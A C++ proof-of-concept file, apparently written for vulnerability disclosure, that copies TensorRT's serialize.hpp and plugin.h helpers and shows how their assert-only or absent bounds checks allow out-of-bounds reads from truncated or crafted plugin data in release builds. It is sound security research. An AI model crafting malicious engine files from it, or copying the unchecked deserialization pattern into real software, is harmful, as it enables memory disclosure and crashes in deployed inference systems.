// tensorrt-oob-deserialize-poc / poc_tensorrt_serialize.cpp
// Uploaded by ReLrO with huggingface_hub (commit e00c466, verified)
/*
* PoC: Out-of-bounds heap read in TensorRT plugin deserialization
*
* Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
* which is compiled out in release builds (NDEBUG defined). The read<T>()
* function in plugin.h has ZERO bounds checking. When a malicious TensorRT
* engine file (.trt/.engine/.plan) contains a plugin with truncated or
* crafted serialization data, the deserialization reads past the buffer
* boundary.
*
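* This PoC documents two assert-only checks in serialize.hpp. At runtime it exercises
* the string path (#2) and the unchecked read<T>() from plugin.h; the vector path (#1)
* is described for reference but is not triggered: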
*
* 1. serialize.hpp vector deserialization (line 101-112):
* - Reads attacker-controlled `size` from buffer
* - Resizes vector to `size`
* - Computes nbyte = size * sizeof(T) (can overflow)
* - assert(*buffer_size >= nbyte) — NO-OP in release
* - memcpy from buffer with no bounds check
*
* 2. serialize.hpp string deserialization (line 128-138):
* - Reads attacker-controlled `nbyte` from buffer
* - Resizes string to nbyte
* - assert(*buffer_size >= nbyte) — NO-OP in release
* - memcpy from buffer with no bounds check
*
* Affected code:
* - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
* - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
* - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
* - TensorRT/plugin/common/plugin.h:100-108 (read<T>() — zero checks)
*
* All 30+ TensorRT plugins that use these primitives are affected.
*
* Build and run:
* # Debug (assert enabled — catches the bug):
* g++ -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
* ./poc_debug
*
* # Release (assert disabled — ASAN catches OOB read):
* g++ -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
* ./poc_release
*/
#include <cassert>
#include <cstdint>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/serialize.hpp
// ============================================================================
// Forward declarations: the Serializer specializations below call these two helpers
// before their definitions appear further down in this file.
//
// serialize_value writes `value` at *buffer; it takes no destination size.
template <typename T>
inline void serialize_value(void** buffer, T const& value);
// deserialize_value reads into *value from *buffer; *buffer_size is the byte count the
// Serializer implementations compare against (in an assert) and decrement.
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);
namespace
{
// Primary template: intentionally empty. Only the specializations below define
// serialized_size()/serialize()/deserialize(), so using Serializer<T> with a type that
// matches none of them fails to compile.
template <typename T, class Enable = void>
struct Serializer
{
};
// POD serializer — assert-only bounds check
// Selected for arithmetic and enum types; values are copied as raw bytes.
template <typename T>
struct Serializer<T, typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
// Number of bytes serialize() writes for a value of type T.
static size_t serialized_size(T const&)
{
return sizeof(T);
}
// Copies sizeof(T) bytes of `value` to *buffer and advances *buffer past them.
// No destination capacity is passed in or checked.
static void serialize(void** buffer, T const& value)
{
::memcpy(*buffer, &value, sizeof(T));
reinterpret_cast<char*&>(*buffer) += sizeof(T);
}
// Copies sizeof(T) bytes from *buffer into *value, advances *buffer and subtracts
// sizeof(T) from *buffer_size. The assert is the only comparison against
// *buffer_size; with NDEBUG the memcpy runs unconditionally and the unsigned
// subtraction wraps around if *buffer_size was smaller than sizeof(T).
static void deserialize(void const** buffer, size_t* buffer_size, T* value)
{
assert(*buffer_size >= sizeof(T)); // NO-OP when NDEBUG is defined!
::memcpy(value, *buffer, sizeof(T));
reinterpret_cast<char const*&>(*buffer) += sizeof(T);
*buffer_size -= sizeof(T);
}
};
// Vector serializer — assert-only bounds check + potential integer overflow
// Selected for std::vector<T> where T is an arithmetic or enum type.
// Wire format: element count (as written by serialize_value for value.size()),
// followed by the raw bytes of the elements.
template <typename T>
struct Serializer<std::vector<T>,
typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
// Size of the count field plus the raw element bytes.
static size_t serialized_size(std::vector<T> const& value)
{
return sizeof(value.size()) + value.size() * sizeof(T);
}
// Writes the element count, then the element bytes, advancing *buffer past both.
// No destination capacity is passed in or checked.
static void serialize(void** buffer, std::vector<T> const& value)
{
serialize_value(buffer, value.size());
size_t nbyte = value.size() * sizeof(T);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
// Reads the element count from the buffer, resizes *value to that count, then copies
// count * sizeof(T) bytes out of the buffer. The count comes straight from the input
// and the assert is the only comparison of nbyte against *buffer_size, so with NDEBUG
// the memcpy reads nbyte bytes regardless of how many are actually left.
static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
{
size_t size;
deserialize_value(buffer, buffer_size, &size);
value->resize(size);
size_t nbyte = value->size() * sizeof(T);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
::memcpy(value->data(), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
// String serializer — assert-only bounds check
// Wire format: byte length (size_t), followed by the characters (no terminator is written).
template <>
struct Serializer<std::string>
{
// Size of the length field plus the character bytes.
static size_t serialized_size(std::string const& value)
{
return sizeof(value.size()) + value.size();
}
// Writes the length, then the characters, advancing *buffer past both.
// No destination capacity is passed in or checked.
static void serialize(void** buffer, std::string const& value)
{
size_t nbyte = value.size();
serialize_value(buffer, nbyte);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
// Reads the length from the buffer, resizes *value to it, then copies that many bytes
// out of the buffer. The length comes straight from the input and both checks are
// asserts, so with NDEBUG the memcpy reads nbyte bytes regardless of *buffer_size and
// the final subtraction wraps around when nbyte exceeds it.
static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
{
size_t nbyte;
deserialize_value(buffer, buffer_size, &nbyte);
value->resize(nbyte);
assert(value->size() == nbyte);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
// const_cast yields a writable pointer even where data() returns char const*.
::memcpy(const_cast<char*>(value->data()), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
} // namespace
// Writes `value` at *buffer using the Serializer specialization selected for T; the
// specializations advance *buffer past the bytes they write.
// No destination size is passed in or checked here.
template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
Serializer<T>::serialize(buffer, value);
}
// Reads a T from *buffer into *value using the Serializer specialization selected for T.
// The specializations advance *buffer and decrement *buffer_size; their only check of
// *buffer_size is an assert, so this call performs no bounds check when NDEBUG is defined.
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
Serializer<T>::deserialize(buffer, buffer_size, value);
}
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/plugin.h
// ============================================================================
// Reads one OutType from the byte cursor `buffer` and advances the cursor by
// sizeof(OutType). `buffer` is taken by reference so the caller's pointer moves.
// The function receives neither an end pointer nor a remaining length, so it has no
// way to detect a read that runs past the end of the underlying storage.
template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
// Pointer arithmetic below is in units of BufferType, so it must be byte-sized.
static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
OutType val{};
// Byte-wise copy: the source does not need to be aligned for OutType.
std::memcpy(&val, static_cast<void const*>(buffer), sizeof(OutType));
buffer += sizeof(OutType);
return val;
}
// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================
// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// with a truncated/malicious buffer.
//
// A real FlattenConcat expects: bool + int32 + int32 + int32 + (mNumInputs * int32) + ...
// This PoC writes only the fixed header into a 16-byte buffer:
//   bool    mIgnoreBatch      = false
//   int32_t mConcatAxisID     = 1
//   int32_t mOutputConcatAxis = 0
//   int32_t mNumInputs        = 1000   (attacker-controlled)
// which leaves fewer than sizeof(int32_t) filler bytes ('A') after the header. The first
// per-input read<int32_t>() therefore starts inside the buffer and runs past its end.
// That final read is deliberate undefined behaviour; everything before it is in bounds.
void poc_read_oob()
{
    std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
    std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;

    char buffer[16];
    std::memset(buffer, 0x41, sizeof(buffer)); // Fill with 'A' for visibility

    // The demonstration relies on the header fitting and on the tail being too short
    // for one more int32_t; fail the build if a platform's sizes break that.
    constexpr std::size_t kHeaderBytes = sizeof(bool) + 3 * sizeof(std::int32_t);
    static_assert(kHeaderBytes <= sizeof(buffer), "header must fit in the buffer");
    static_assert(sizeof(buffer) - kHeaderBytes < sizeof(std::int32_t),
        "tail must be too short for another int32_t");

    // Fields are packed back to back, so the int32_t fields land on odd offsets.
    // Store them with memcpy: writing through a casted int32_t* would be a misaligned,
    // type-punned access, i.e. unintended UB unrelated to the bug being demonstrated.
    char* wp = buffer;
    auto const put = [&wp](auto const& field) {
        std::memcpy(wp, &field, sizeof(field));
        wp += sizeof(field);
    };
    put(false);              // mIgnoreBatch
    put(std::int32_t{1});    // mConcatAxisID
    put(std::int32_t{0});    // mOutputConcatAxis
    put(std::int32_t{1000}); // mNumInputs — attacker-controlled element count

    // Header reads: all four stay inside the buffer.
    char const* d = buffer;
    bool const ignoreBatch = read<bool>(d);
    std::int32_t const concatAxisID = read<std::int32_t>(d);
    std::int32_t const outputConcatAxis = read<std::int32_t>(d);
    std::int32_t const numInputs = read<std::int32_t>(d); // last fully in-bounds read
    std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
              << " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;

    // A plugin would now read numInputs more int32 values. Already the first of them
    // extends past the end of the buffer. std::endl is used so the message is flushed
    // before a sanitizer can abort the process.
    std::cout << "Next read goes OOB..." << std::endl;
    // NOTE: `buffer` is a local array, so this is an overflow of stack storage here;
    // in TensorRT the serialized plugin data would come from the engine file.
    std::int32_t const oob_value = read<std::int32_t>(d); // <-- OUT-OF-BOUNDS READ
    std::cout << "OOB read value: " << oob_value << std::endl;
}
// Demonstrates the string deserialization with crafted length.
//
// The heap buffer holds a size_t length field claiming 256 bytes, followed by only
// 8 bytes of payload. deserialize_value<std::string>() trusts the length field:
//   - debug build (NDEBUG not defined): the assert on the remaining size fires;
//   - release build (NDEBUG defined): the assert is compiled out and memcpy reads
//     256 bytes from a region that only has 8 — a deliberate out-of-bounds heap read.
void poc_string_deserialize_oob()
{
    std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;

    size_t const fake_length = 256; // length the buffer claims to carry
    size_t const actual_data = 8;   // payload bytes actually present after the length field

    // std::vector owns the allocation, so it is released even if deserialization
    // throws (e.g. from the resize driven by the crafted length).
    std::vector<char> buffer(sizeof(size_t) + actual_data);
    std::memcpy(buffer.data(), &fake_length, sizeof(size_t));      // write the fake length
    std::memset(buffer.data() + sizeof(size_t), 'B', actual_data); // write 8 bytes of data

    void const* ptr = buffer.data();
    size_t remaining = buffer.size();
    std::string result;
#ifdef NDEBUG
    std::cout << "NDEBUG defined — assert() is disabled, OOB read will occur" << std::endl;
#else
    std::cout << "NDEBUG not defined — assert() will catch the bug (this is expected in debug)" << std::endl;
    std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif
    // This will:
    //   1. Read size_t fake_length (256) from buffer
    //   2. Resize string to 256
    //   3. assert(remaining >= 256) — NO-OP in release!
    //   4. memcpy 256 bytes from a buffer that only has 8 bytes left — OOB READ
    deserialize_value(&ptr, &remaining, &result);

    std::cout << "String length: " << result.size() << std::endl;
    std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;
}
// Entry point.
//
// Usage: <program> [1|2]
//   no argument : run PoC 1 (read<T>()) and then PoC 2 (string deserialization)
//   1           : run only PoC 1
//   2           : run only PoC 2
// The selector exists because each PoC deliberately performs an invalid read: when a
// sanitizer or an assert terminates the process inside one PoC, the other cannot run in
// the same invocation. Returns 0 on completion, 2 on an unrecognized argument.
int main(int argc, char** argv)
{
    std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
    std::cout << "====================================" << std::endl;
#ifdef NDEBUG
    std::cout << "Build mode: RELEASE (NDEBUG defined — assert() disabled)" << std::endl;
#else
    std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif

    std::string const selected = (argc > 1) ? argv[1] : "";
    if (!selected.empty() && selected != "1" && selected != "2")
    {
        std::cerr << "usage: " << argv[0] << " [1|2]" << std::endl;
        return 2;
    }

    if (selected.empty() || selected == "1")
    {
        poc_read_oob();
    }
    if (selected.empty() || selected == "2")
    {
        poc_string_deserialize_oob();
    }
    return 0;
}